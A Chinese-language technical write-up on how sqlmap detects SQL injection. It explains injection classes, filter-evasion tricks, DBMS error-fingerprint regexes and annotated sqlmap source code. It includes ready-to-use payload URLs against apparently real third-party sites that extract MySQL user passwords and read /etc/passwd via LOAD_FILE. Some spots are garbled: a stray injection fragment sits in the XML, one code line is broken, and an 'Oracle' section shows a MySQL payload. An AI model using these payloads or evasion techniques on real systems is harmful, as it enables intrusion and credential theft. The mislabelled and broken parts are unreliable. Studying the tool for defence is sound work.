sqlmap 中的 SQL Injection 检测技术
https://github.com/henices/sqli
https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)
基于信道的 sql injection 分类
Inband
SQL代码注入和SQL injection 结果的获取在同一频道(e.g. 浏览器), 获得的数据直接显示在应用程序页面的正常输出或者错误信息中,这是最简单的攻击类型。
Out-of-band
SQL查询数据的传输使用不同的频道(e.g HTTP,DNS), 这是从数据库中获取大量数据简单的方法。
Inferential
没用真实有用的数据传输,但是攻击者可以通过发送特定的请求,观察数据库服务器的返回的结果的行为重建信息。
基于 sql inject 检测技术的分类
boolean-based blind SQL injection
也被称为推理SQL注入:SqlMap替换或追加HTTP请求中受影响的参数,一个有效的SQL语句字符串包含 SELECT 子语句,或任何其他用户要检索输出的SQL语句。对于每个HTTP响应,将其 headers/body和原始请求的做比较,该工具一个字符一个字符地分析的注入语句的输出。另外,用户可以提供一个字符串或正则表达式匹配正确的页面。使用SqlMap实现的二分算法来实施执行此技术可以获取七个最大的每个HTTP请求的输出的每一个字符。凡不属于输出纯文本纯字符集,SqlMap将适应与更大范围的算法来检测输出。
error-based SQL injection
sqlmap替换或者追加受影响的HTTP参数一个特定数据的语法错误的SQL语句,分析HTTP 响应header和body,查询DBMS错误信息中是否包含注入的预先定义的字符串链,并且SQL语句的输出在字符串链的中间.这种技术仅在web应用程序被配置成泄漏后端数据库管理系统错误信息时有效。
time-based blind or stacked queries
也被称为全盲SQL注入:SqlMap替换或追加HTTP请求中受影响的参数,构造一个有效的SQL语句字符串包含一个查询,使后端DBMS sleep几秒钟。对于每个HTTP响应,比较其响应时间与原始请求的HTTP响应时间,该工具一个字符一个字符地分析的注入语句的输出。和boolean-based技术一样,同样应用了二分算法(bisection algorithm)。
UNION query SQL injection
SqlMap 追加受影响的参数一个以UNION ALL SELECT开始的有效的SQL语句字符串。这种技术当Web应用程序页面内将SELECT语句的同一周期输出,或者类似的,网页上的内容中显示查询结果的每一行时有效。SqlMap是还可以利用部分UNION 查询的SQL注入漏洞,当SQL语句的输出不是在一个周期内的,在构造的区域内只有在查询输出的第一项被显示。
Stacked queries SQL injection
也被称为多语句SQL注入(multiple statements SQL injection):SqlMap 测试 Web 应用程序是否支持批量叠查询, 然后,它支持的情况下,它附加到HTTP请求中受影响的参数,一个分号(;) 随后的SQL语句会被执行。这种技术在执行 SELECT以外的SQL语句时非常有用,根据后端数据库管理系统的不同用户和会话特权,数据定义和数据操作SQL语句可能导致文件系统的读写访问和操作系统命令执行的。
SQL Injection 检测的逃逸技术
随机大小写
INSERT => InsERt
支持的数据库类型:
数据库 | 是否支持 |
---|---|
MSSQL | 支持 |
MySQL | 支持 |
PostgreSQL | 支持 |
Oracle | 支持 |
空格用注释替换
SELECT id FROM users => SELECT/**/id/**/FROM/**/users
支持的数据库类型:
数据库 | 是否支持 |
---|---|
MSSQL | 支持 |
MySQL | 支持 |
PostgreSQL | 支持 |
Oracle | 支持 |
Access | 不支持 |
Oracle 10g 测试
SQL> select/**/*/**/from v$version;
BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Prod
PL/SQL Release 10.1.0.3.0 - Production
CORE 10.1.0.3.0 Production
TNS for Linux: Version 10.1.0.3.0 - Production
NLSRTL Version 10.1.0.3.0 - Production
PostgreSQL:
postgres=# select/*abc*/version();
version
--------------------------------------------------------------------------------------------------------------------
PostgreSQL 8.1.4 on i686-pc-linux-gnu, compiled by GCC i686-pc-linux-gnu-gcc (GCC) 3.4.6 (Gentoo 3.4.6-r1, ssp-3.4.5-1.0, pie-8.7.9)
随机注释
INSERT => IN/**/S/**/ERT
本身语法不支持,但可以对付不正确的过滤.
postgres=# selec/**/t version();
ERROR: syntax error at or near “selec” 在字符 1
第 1 行: selec/**/t version();
Oracle:
SQL> sel/**/ect v$version;
SP2-0734: unknown command beginning “sel/**/ect…” - rest of line ignored.
空格用+替换
SELECT id FROM users => SELECT+id+FROM+users
随机空格替换
SELECT id FROM users => SELECT\rid\tFROM\nusers
数据库 | 是否支持 |
---|---|
MSSQL | 支持 |
Mysql | 支持 |
PostgreSQL | 支持 |
Oracle | 支持 |
$echo -e "select\t*from\tv\$version;"| sqlplus "/ as sysdba"
SQL>
BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Prod
PL/SQL Release 10.1.0.3.0 - Production
CORE 10.1.0.3.0 Production
TNS for Linux: Version 10.1.0.3.0 - Production
NLSRTL Version 10.1.0.3.0 - Production
echo -e "select\tversion();" | psql -U postgres
version
--------------------------------------------------------------------------------------------------------------------------------------
PostgreSQL 8.1.4 on i686-pc-linux-gnu, compiled by GCC i686-pc-linux-gnu-gcc (GCC) 3.4.6 (Gentoo 3.4.6-r1, ssp-3.4.5-1.0, pie-8.7.9)
urlencode
SELECT FIELD FROM%20TABLE' => '%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45'
between 替换
A > B' => 'A NOT BETWEEN 0 AND B
逃避正则表达式检测
or 1=1 使用 or 'a'='a'
DBMS分析技术
通过错误信息分析DBMS
<?xml version="1.0" encoding="UTF-8"?>
<root>
<!-- MySQL -->
<dbms value="MySQL">
<error regexp="SQL syntax.*MySQL"/>
<error regexp="Warning.*mysql_.*"/>
<error regexp="valid MySQL result"/>
<error regexp="MySqlClient\."/>
</dbms>
<!-- PostgreSQL -->
<dbms value="PostgreSQL">
<error regexp="PostgreSQL.*ERROR"/>
<error regexp="Warning.*\Wpg_.*"/>
<error regexp="valid PostgreSQL result"/>
<error regexp="Npgsql\."/>
</dbms>
<!-- Microsoft SQL Server -->
<dbms value="Microsoft SQL Server">
<error regexp="Driver.* SQL[\-\_\ ]*Server"/>
<error regexp="OLE DB.* SQL Server"/>
<error regexp="(\W|\A)SQL Server.*Driver"/>
<error regexp="Warning.*mssql_.*"/>
<error regexp="(\W|\A)SQL Server.*[0-9a-fA-F]{8}"/>
<error regexp="Exception Details:.*\WSystem\.Data\.SqlClient\."/>
<error regexp="Exception Details:.*\WRoadhouse\.Cms\."/>
</dbms>
<!-- Microsoft Access -->
<dbms value="Microsoft Access">
<error regexp="Microsoft Access Driver"/>
<error regexp="JET Database Engine"/>
<error regexp="Access Database Engine"/>
</dbms>
<!-- Oracle -->
<dbms value="Oracle">
<error regexp="ORA-[0-9][0-9][0-9][0-9]"/>
<error regexp="Oracle error"/>
<error regexp="Oracle.*Driver"/>
<error regexp="Warning.*\Woci_.*"/>
<error regexp="Warning.*\Wora_.*"/>
</dbms>
<!-- DB2 -->
<dbms value="DB2">
<error regexp="CLI Driver.*DB2"/>
<error regexp="DB2 SQL error"/>
</dbms>
<!-- Informix -->
<dbms value="Informix">
<error regexp="Exception.*Informix"/>
</dbms>
<!-- Interbase/Firebird -->
<dbms value="Firebird">
<error regexp="Dynamic SQL Error"/>
<error regexp="Warning.*ibase_.*"/>
</dbms>
<!-- SQLite -->
<dbms value="SQLite">AND '[RANDSTR]'='[RANDSTR]
<error regexp="SQLite/JDBCDriver"/>
<error regexp="SQLite.Exception"/>
<error regexp="System.Data.SQLite.SQLiteException"/>
<error regexp="Warning.*sqlite_.*"/>
<error regexp="Warning.*SQLite3::"/>
</dbms>
<!-- SAP MaxDB -->
<dbms value="SAP MaxDB">
<error regexp="SQL error.*POS([0-9]+).*"/>
<error regexp="Warning.*maxdb.*"/>
</dbms>
<!-- Sybase -->
<dbms value="Sybase">
<error regexp="Warning.*sybase.*"/>
<error regexp="Sybase message"/>
<error regexp="Sybase.*Server message.*"/>
</dbms>
<!-- Ingres -->
<dbms value="Ingres">
<error regexp="Warning.*ingres_"/>
<error regexp="Ingres SQLSTATE"/>
<error regexp="Ingres\W.*Driver"/>
</dbms>
</root>
更详细地需要DBMS fingerprint 识别技术
检测SQL Injection 的报文
- 检查参数是否动态
def checkDynParam(place, parameter, value):
"""
This function checks if the url parameter is dynamic. If it is
dynamic, the content of the page differs, otherwise the
dynamicity might depend on another parameter.
"""
kb.matchRatio = None
infoMsg = "testing if %s parameter '%s' is dynamic" % (place, parameter)
logger.info(infoMsg)
# 生成一个随机字符串
randInt = randomInt()
payload = agent.payload(place, parameter, value, getUnicode(randInt))
logger.debug("checkDynParam: %s", payload)
dynResult = Request.queryPage(payload, place, raise404=False)
# 如果和原先页面一样,不是动态参数
if True == dynResult:
return False
infoMsg = "confirming that %s parameter '%s' is dynamic" % (place, parameter)
logger.info(infoMsg)
# 再次检查,确认
randInt = randomInt()
payload = agent.payload(place, parameter, value, getUnicode(randInt))
dynResult = Request.queryPage(payload, place, raise404=False)
return not dynResult
启发式检测,长度为10的 “,’, ), ( 随机字符串, 使用python RandomStr, 如果发生已知错误,报可能存在sql injection, 可能的数据库
基于risk 和 level的级别,使用payloads.xml中的报文进行检测
判断url连接是否稳定,连续连接url两次,如果返回内容完全相同,则认为url稳定。
NullConnection http://www.wisec.it/sectou.php?id=472f952d79293
怎么判断injected payload 成功
comparison 算法, boolean-based blind SQL injections
使用 difflib.SequenceMatcher, 基于页面相似度如果请求发生错误,所有不正确的请求都认为正确。
def comparison(page, getRatioValue=False, pageLength=None):
if page is None and pageLength is None:
return None
regExpResults = None
seqMatcher = getCurrentThreadData().seqMatcher
#logger.debug(kb.pageTemplate)
seqMatcher.set_seq1(kb.pageTemplate)
if page:
# String to match in page when the query is valid
#a.1 如果出现指定字符串,返回True
if conf.string:
condition = conf.string in page
return condition if not getRatioValue else (MAX_RATIO if condition else MIN_RATIO)
# Regular expression to match in page when the query is valid
# a.2 如果出现指定正则表达式,返回Ture
if conf.regexp:
condition = re.search(conf.regexp, page, re.I | re.M) is not None
return condition if not getRatioValue else (MAX_RATIO if condition else MIN_RATIO)
# In case of an DBMS error page return None
if kb.errorIsNone and (wasLastRequestDBMSError() or wasLastRequestHTTPError()):
return None
# Dynamic content lines to be excluded before comparison
# a.4 比较前先将两个页面的动态内容移除
if not kb.nullConnection:
page = removeDynamicContent(page)
seqMatcher.set_seq1(removeDynamicContent(kb.pageTemplate))
if not pageLength:
pageLength = len(page)
# 连接发生错误
if kb.nullConnection and pageLength:
if not seqMatcher.a:
errMsg = "problem occured while retrieving original page content "
errMsg += "which prevents sqlmap from continuation. please rerun, "
errMsg += "and if problem persists please turn off optimization switches"
raise sqlmapNoneDataException, errMsg
ratio = 1. * pageLength / len(seqMatcher.a)
if ratio > 1.:
ratio = 1. / ratio
else:
# 正常连接情况, 判断是否使用textOnly命令行参数
seqMatcher.set_seq1(getFilteredPageContent(seqMatcher.a, True) if conf.textOnly else seqMatcher.a)
seqMatcher.set_seq2(getFilteredPageContent(page, True) if conf.textOnly else page)
# float 3 digits
ratio = round(seqMatcher.quick_ratio(), 3)
logger.debug('ratio: %s' % ratio)
# If the url is stable and we did not set yet the match ratio and the
# current injected value changes the url page content
if kb.matchRatio is None:
if kb.pageStable and ratio >= LOWER_RATIO_BOUND and ratio <= UPPER_RATIO_BOUND:
kb.matchRatio = ratio
logger.debug("setting match ratio for current parameter to %.3f" % kb.matchRatio)
elif not kb.pageStable:
# CONSTANT_RATIO = 0.900
kb.matchRatio = CONSTANT_RATIO
logger.debug("setting match ratio for current parameter to default value 0.900")
# If it has been requested to return the ratio and not a comparison
# response
if getRatioValue:
return ratio
# ratio > 0.98, 认为两个页面一样
elif ratio > UPPER_RATIO_BOUND:
return True
elif kb.matchRatio is None:
return None
else:
# url 不稳定
if kb.matchRatio == CONSTANT_RATIO:
return ratio > kb.matchRatio
else:
# DIFF_TOLERANCE = 0.05 magic number
return (ratio - kb.matchRatio) > DIFF_TOLERANCE
移除动态内容
def removeDynamicContent(page):
"""
Removing dynamic content from supplied page basing removal on
precalculated dynamic markings
"""
if page:
for item in kb.dynamicMarkings:
prefix, suffix = item
if prefix is None and suffix is None:
continue
elif prefix is None:None
page = getCompiledRegex('(?s)^.+%s' % suffix).sub(suffix, page)
elif suffix is None:
page = getCompiledRegex('(?s)%s.+$' % prefix).sub(prefix, page)
else:
page = getCompiledRegex('(?s)%s.+%s' % (prefix, suffix)).sub('%s%s' % (prefix, suffix), page)
return page
# 查找动态内容
def findDynamicContent(firstPage, secondPage):
"""
This function checks if the provided pages have dynamic content. If they
are dynamic, proper markings will be made
"""
infoMsg = "searching for dynamic content"
logger.info(infoMsg)
# 返回匹配的内容
blocks = SequenceMatcher(None, firstPage, secondPage).get_matching_blocks()
kb.dynamicMarkings = []
# Removing too small matching blocks
i = 0
while i < len(blocks):
block = blocks[i]
(_, _, length) = block
# DYNAMICITY_MARK_LENGTH = 32
if length <= DYNAMICITY_MARK_LENGTH:
blocks.remove(block)
else:
i += 1
# Making of dynamic markings based on prefix/suffix principle
if len(blocks) > 0:
# 在blocks的前后添加None
blocks.insert(0, None)
blocks.append(None)
#
for i in xrange(len(blocks) - 1):
prefix = firstPage[blocks[i][0]:blocks[i][0] + blocks[i][2]] if blocks[i] else None
suffix = firstPage[blocks[i + 1][0]:blocks[i + 1][0] + blocks[i + 1][2]] if blocks[i + 1] else None
if prefix is None and blocks[i + 1][0] == 0:
continue
if suffix is None and (blocks[i][0] + blocks[i][2] >= len(firstPage)):
continue
# 去掉字符串头和尾的字母和数字
prefix = trimAlphaNum(prefix)
suffix = trimAlphaNum(suffix)
kb.dynamicMarkings.append((re.escape(prefix[-DYNAMICITY_MARK_LENGTH/2:]) if prefix else None, re.escape(suffix[:DYNAMICITY_MARK_LENGTH/2]) if suffix else None))
if len(kb.dynamicMarkings) > 0:
infoMsg = "dynamic content marked for removal (%d region%s)" % (len(kb.dynamicMarkings), 's' if len(kb.dynamicMarkings) > 1 else '')
logger.info(infoMsg)
grep(正则表达式), error-based SQL injection, 可以检查
MS SQL server, Oracle, Mysql等,使用的语句,使用随机字符串查询,如果返回结果的body,或者头部信息中包含我们构造的随机字符串,则认为存在漏洞.具体数据可以使用sqlmap, payloads.xml,例子:
MySQL >= 5.0 AND error-based - WHERE or HAVING clause
http://to.goojje.com/qunba.php?ac=thread_qb&tid=9136%20AND%20(SELECT%209066%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,106,108,98,58),(MID((IFNULL(CAST(VERSION()%20AS%20CHAR),CHAR(32))),1,50)),CHAR(58,108,112,108,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)
urldecode 后:
http://to.goojje.com/qunba.php?ac=thread_qb&tid=9136 AND (SELECT 9066 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,108,98,58),(MID((IFNULL(CAST(VERSION() AS CHAR),CHAR(32))),1,50)),CHAR(58,108,112,108,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
- CONCAT 字符串连接
- IFNULL 判断是否为空
- CAST 将字符串转化为不同的字符集
- MID 字符串截取 MID(string, position[, length])
- CHAR(58,106,108,98,58) => :bjl:
- CHAR(58,108,112,108,58) => :lpl:
利用的Mysql的一个特性,http://bugs.mysql.com/bug.php?id=32249
Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
这部分没有记录。
PostgreSQL AND error-based - WHERE or HAVING clause
这部分没有记录。
Oracle AND error-based - WHERE or HAVING clause (XMLType)
http://to.goojje.com/qunba.php?ac=thread_qb&tid=9136 AND (SELECT 6531 FROM(SELECT COUNT(*),CONCAT(CHAR(58,121,121,98,58),(SELECT MID(IFNULL(CAST(concat(user,char(58),password) AS CHAR), CHAR(32)),1,50) FROM mysql.user LIMIT 0,1),CHAR(58,106,116,113,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
unionTest() 函数,UNION query (inband) SQL injection
(1) 设置union 使用的字符和注释
(2) 判断union查询的列数
def forgeInbandQuery(self, query, position, count, comment, prefix, suffix, char, multipleUnions=None, limited=False):
"""
Take in input an query (pseudo query) string and return its
processed UNION ALL SELECT query.
Examples:
MySQL input: CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR(32)),CHAR(105,73,99,89,69,74)) FROM mysql.user
MySQL output: UNION ALL SELECT NULL, CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR(32)),CHAR(105,73,99,89,69,74)), NULL FROM mysql.user-- AND 7488=7488
PostgreSQL input: (CHR(116)||CHR(111)||CHR(81)||CHR(80)||CHR(103)||CHR(70))||COALESCE(CAST(usename AS CHARACTER(10000)), (CHR(32)))||(CHR(106)||CHR(78)||CHR(121)||CHR(111)||CHR(84)||CHR(85))||COALESCE(CAST(passwd AS CHARACTER(10000)), (CHR(32)))||(CHR(108)||CHR(85)||CHR(122)||CHR(85)||CHR(108)||CHR(118)) FROM pg_shadow
PostgreSQL output: UNION ALL SELECT NULL, (CHR(116)||CHR(111)||CHR(81)||CHR(80)||CHR(103)||CHR(70))||COALESCE(CAST(usename AS CHARACTER(10000)), (CHR(32)))||(CHR(106)||CHR(78)||CHR(121)||CHR(111)||CHR(84)||CHR(85))||COALESCE(CAST(passwd AS CHARACTER(10000)), (CHR(32)))||(CHR(108)||CHR(85)||CHR(122)||CHR(85)||CHR(108)||CHR(118)), NULL FROM pg_shadow-- AND 7133=713
Oracle input: (CHR(109)||CHR(89)||CHR(75)||CHR(109)||CHR(85)||CHR(68))||NVL(CAST(COLUMN_NAME AS VARCHAR(4000)), (CHR(32)))||(CHR(108)||CHR(110)||CHR(89)||CHR(69)||CHR(122)||CHR(90))||NVL(CAST(DATA_TYPE AS VARCHAR(4000)), (CHR(32)))||(CHR(89)||CHR(80)||CHR(98)||CHR(77)||CHR(80)||CHR(121)) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=(CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(83))
Oracle output: UNION ALL SELECT NULL, (CHR(109)||CHR(89)||CHR(75)||CHR(109)||CHR(85)||CHR(68))||NVL(CAST(COLUMN_NAME AS VARCHAR(4000)), (CHR(32)))||(CHR(108)||CHR(110)||CHR(89)||CHR(69)||CHR(122)||CHR(90))||NVL(CAST(DATA_TYPE AS VARCHAR(4000)), (CHR(32)))||(CHR(89)||CHR(80)||CHR(98)||CHR(77)||CHR(80)||CHR(121)), NULL FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=(CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(83))-- AND 6738=6738
Microsoft SQL Server input: (CHAR(74)+CHAR(86)+CHAR(106)+CHAR(116)+CHAR(116)+CHAR(108))+ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32)))+(CHAR(89)+CHAR(87)+CHAR(116)+CHAR(100)+CHAR(106)+CHAR(74))+ISNULL(CAST(master.dbo.fn_varbintohexstr(password) AS VARCHAR(8000)), (CHAR(32)))+(CHAR(71)+CHAR(74)+CHAR(68)+CHAR(66)+CHAR(85)+CHAR(106)) FROM master..sysxlogins
Microsoft SQL Server output: UNION ALL SELECT NULL, (CHAR(74)+CHAR(86)+CHAR(106)+CHAR(116)+CHAR(116)+CHAR(108))+ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32)))+(CHAR(89)+CHAR(87)+CHAR(116)+CHAR(100)+CHAR(106)+CHAR(74))+ISNULL(CAST(master.dbo.fn_varbintohexstr(password) AS VARCHAR(8000)), (CHAR(32)))+(CHAR(71)+CHAR(74)+CHAR(68)+CHAR(66)+CHAR(85)+CHAR(106)), NULL FROM master..sysxlogins-- AND 3254=3254
@param query: it is a processed query string unescaped to be
forged within an UNION ALL SELECT statement
@type query: C{str}
@param position: it is the NULL position where it is possible
to inject the query
@type position: C{int}
@return: UNION ALL SELECT query string forged
@rtype: C{str}
"""
if query.startswith("SELECT "):
query = query[len("SELECT "):]
inbandQuery = self.prefixQuery("UNION ALL SELECT ", prefix=prefix)
if limited:
inbandQuery += ",".join(map(lambda x: char if x != position else '(SELECT %s)' % query, xrange(0, count)))
inbandQuery += FROM_TABLE.get(Backend.getIdentifiedDbms(), "")
inbandQuery = self.suffixQuery(inbandQuery, comment, suffix)
return inbandQuery
topNumRegex = re.search("\ATOP\s+([\d]+)\s+", query, re.I)
if topNumRegex:
topNum = topNumRegex.group(1)
query = query[len("TOP %s " % topNum):]
inbandQuery += "TOP %s " % topNum
intoRegExp = re.search("(\s+INTO (DUMP|OUT)FILE\s+\'(.+?)\')", query, re.I)
if intoRegExp:
intoRegExp = intoRegExp.group(1)
query = query[:query.index(intoRegExp)]
if Backend.getIdentifiedDbms() in FROM_TABLE and inbandQuery.endswith(FROM_TABLE[Backend.getIdentifiedDbms()]):
inbandQuery = inbandQuery[:-len(FROM_TABLE[Backend.getIdentifiedDbms()])]
for element in xrange(0, count):
if element > 0:
inbandQuery += ", "
if element == position:
if " FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT "):
conditionIndex = query.index(" FROM ")
inbandQuery += query[:conditionIndex]
else:
inbandQuery += query
else:
inbandQuery += char
if " FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT "):
conditionIndex = query.index(" FROM ")
inbandQuery += query[conditionIndex:]
if Backend.getIdentifiedDbms() in FROM_TABLE:
if " FROM " not in inbandQuery or "(CASE " in inbandQuery or "(IIF" in inbandQuery:
inbandQuery += FROM_TABLE[Backend.getIdentifiedDbms()]
if intoRegExp:
inbandQuery += intoRegExp
if multipleUnions:
inbandQuery += " UNION ALL SELECT "
for element in xrange(count):
if element > 0:
inbandQuery += ", "
if element == position:
inbandQuery += multipleUnions
else:
inbandQuery += char
if Backend.getIdentifiedDbms() in FROM_TABLE:
inbandQuery += FROM_TABLE[Backend.getIdentifiedDbms()]
inbandQuery = self.suffixQuery(inbandQuery, comment, suffix)
return inbandQuery
def __findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=PAYLOAD.WHERE.ORIGINAL):
"""
Finds number of columns affected by UNION based injection
"""
retVal = None
pushValue(kb.errorIsNone)
items, ratios = [], []
kb.errorIsNone = False
lowerCount, upperCount = conf.uColsStart, conf.uColsStop
if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES: # MIN_UNION_RESPONSES = 5
upperCount = lowerCount + MIN_UNION_RESPONSES
min_, max_ = MAX_RATIO, MIN_RATIO # MAX_RATIO = 1.0, MIN_RATIO = 0.0
for count in range(lowerCount, upperCount+1):
query = agent.forgeInbandQuery('', -1, count, comment, prefix, suffix, conf.uChar)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
page, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
ratio = comparison(page, True) or MIN_RATIO
ratios.append(ratio)
min_, max_ = min(min_, ratio), max(max_, ratio)
items.append((count, ratio))
ratios.pop(ratios.index(min_)) # pop the min
ratios.pop(ratios.index(max_)) # pop the max
deviation = stdev(ratios) # 计算标准偏差
if abs(max_ - min_) < MIN_STATISTICAL_RANGE: # MIN_STATISTICAL_RANGE = 0.01
return None
# UNION_STDEV_COEFF = 7
lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation
minItem, maxItem = None, None
for item in items:
if item[1] == min_:
minItem = item
elif item[1] == max_:
maxItem = item
if min_ < lower:
retVal = minItem[0]
if max_ > upper:
if retVal is None or abs(max_ - upper) > abs(min_ - lower):
retVal = maxItem[0]
kb.errorIsNone = popValue()
if retVal:
infoMsg = "target url appears to be UNION injectable with %d columns" % retVal
logger.info(infoMsg)
return retVal
(3) 根据不同的数据库加上必要的from 表名
(4) 再次验证
def __unionPosition(comment, place, parameter, value, prefix, suffix, count, where=PAYLOAD.WHERE.ORIGINAL):
validPayload = None
vector = None
positions = range(0, count)
# Unbiased approach for searching appropriate usable column
# list 中元素乱序
random.shuffle(positions)
# For each column of the table (# of NULL) perform a request using
# the UNION ALL SELECT statement to test it the target url is
# affected by an exploitable inband SQL injection vulnerability
# 查找可以显示的列
for position in positions:
# Prepare expression with delimiters
randQuery = randomStr(UNION_MIN_RESPONSE_CHARS) #UNION_MIN_RESPONSE_CHARS = 10
# 构造随机字符串做标记
phrase = "%s%s%s".lower() % (kb.misc.start, randQuery, kb.misc.stop)
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
import logging
logging.debug('randQueryProcessed: %s' % randQueryProcessed)
randQueryUnescaped = unescaper.unescape(randQueryProcessed)
# Forge the inband SQL injection request
# 构造UNION ALL SELECT 查询
query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, conf.uChar)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
# 移除反射的内容
content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
payload, True) or "")
if content and phrase in content:
validPayload = payload
vector = (position, count, comment, prefix, suffix, conf.uChar, where)
if where == PAYLOAD.WHERE.ORIGINAL:
# Prepare expression with delimiters
randQuery2 = randomStr(UNION_MIN_RESPONSE_CHARS) # UNION_MIN_RESPONSE_CHARS = 10
phrase2 = "%s%s%s".lower() % (kb.misc.start, randQuery2, kb.misc.stop)
randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2)
# Confirm that it is a full inband SQL injection
query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, conf.uChar, multipleUnions=randQueryUnescaped2)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=PAYLOAD.WHERE.NEGATIVE)
# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "")
if content and ((phrase in content and phrase2 not in content) or (phrase not in content and phrase2 in content)):
vector = (position, count, comment, prefix, suffix, conf.uChar, PAYLOAD.WHERE.NEGATIVE)
break
return validPayload, vector
http://ipv6.tsinghua.edu.cn/end.php?ID=-3255%20UNION%20ALL%20SELECT%20NULL,%20CONCAT%28CHAR%2858,107,113,117,58%29,IFNULL%28CAST%28LOAD_FILE%28CHAR%2847,101,116,99,47,104,111,115,116,115%29%29%20AS%20CHAR%29,CHAR%2832%29%29,CHAR%2858,101,114,112,58%29%29,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL#
http://ipv6.tsinghua.edu.cn/end.php?ID=-8675%20UNION%20ALL%20SELECT%20NULL,%20CONCAT%28CHAR%2858,108,100,107,58%29,IFNULL%28CAST%28LOAD_FILE%28CHAR%2847,101,116,99,47,112,97,115,115,119,100%29%29%20AS%20CHAR%29,CHAR%2832%29%29,CHAR%2858,111,121,105,58%29%29,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL#
基于响应时间, time-based blind and stacked queries SQL injections
判断是否delay,在 lib/core/common.py 中wasLastRequestDelayed 实现根据统计结果,sqlmap 注释
def wasLastRequestDelayed():
"""
Returns True if the last web request resulted in a time-delay
"""
# 99.9999999997440% of all non time-based sql injection affected
# response times should be inside +-7*stdev([normal response times])
# Math reference: http://www.answers.com/topic/standard-deviation
deviation = stdev(kb.responseTimes) # 计算所有响应时间的标准偏差
threadData = getCurrentThreadData()
if deviation:
# 需要一定数据量,统计结果才有意义
# MIN_TIME_RESPONSES = 10
if len(kb.responseTimes) < MIN_TIME_RESPONSES:
warnMsg = "time-based standard deviation method used on a model "
warnMsg += "with less than %d response times" % MIN_TIME_RESPONSES
logger.warn(warnMsg)
# TIME_STDEV_COEFF = 10 必须大于等于7
lowerStdLimit = average(kb.responseTimes) + TIME_STDEV_COEFF * deviation
retVal = (threadData.lastQueryDuration >= lowerStdLimit)
# 如果retVal 为True, 发生Delay,需要调整
# TIME_DEFAULT_DELAY = 5, kb.testMode sql injection test mode,
# 用户没用手动更改Delay 时间
if not kb.testMode and retVal and conf.timeSec == TIME_DEFAULT_DELAY:
adjustTimeDelay(threadData.lastQueryDuration, lowerStdLimit)
return retVal
else:
return (threadData.lastQueryDuration - conf.timeSec) >= 0
# length of queue for candidates for time delay adjustment
TIME_DELAY_CANDIDATES = 3
kb.delayCandidates = TIME_DELAY_CANDIDATES * [0]
kb.delayCandidates = [0, 0, 0]
def adjustTimeDelay(lastQueryDuration, lowerStdLimit):
"""
Adjusts time delay in time-based data retrieval
"""
candidate = 1 + int(round((1 - (lastQueryDuration - lowerStdLimit) / lastQueryDuration) * conf.timeSec))
if candidate:
kb.delayCandidates = [candidate] + kb.delayCandidates[:-1]
if all([x == candidate for x in kb.delayCandidates]) and candidate < conf.timeSec:
print
warnMsg = "adjusting time delay to %d second%s " % (candidate, 's' if candidate > 1 else '')
warnMsg += "(due to good response times)"
logger.warn(warnMsg)
conf.timeSec = candidate